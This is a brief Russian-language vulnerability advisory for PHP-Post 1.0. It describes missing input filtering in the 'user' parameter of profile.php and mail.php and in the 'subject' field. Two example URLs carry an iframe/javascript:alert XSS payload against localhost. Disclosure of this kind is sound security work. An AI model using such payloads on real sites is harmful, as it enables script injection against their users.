Программа: PHP-Post 1.0, возможно более ранние версии

Уязвимость позволяет удаленному пользователю произвести XSS нападение.
Отсутствует фильтрация входных данных в параметре "user" в сценариях "profile.php"
и "mail.php" и в поле "subject". Удаленный пользователь может с помощью
специально сформированного запроса выполнить произвольный HTML код в браузере
жертвы в контексте безопасности уязвимого сайта.

Пример:

http://localhost/phpp/profile.php?user=’
%3CIFRAME%20SRC=javascript:alert
(%2527XSS%2527)%3E%3C/IFRAME%3E

http://localhost/phpp/mail.php?user=’ %3CIFRAME%20SRC=javascript:alert
(%2527XSS%2527)%3E%3C/IFRAME%3E
 

Оставить мнение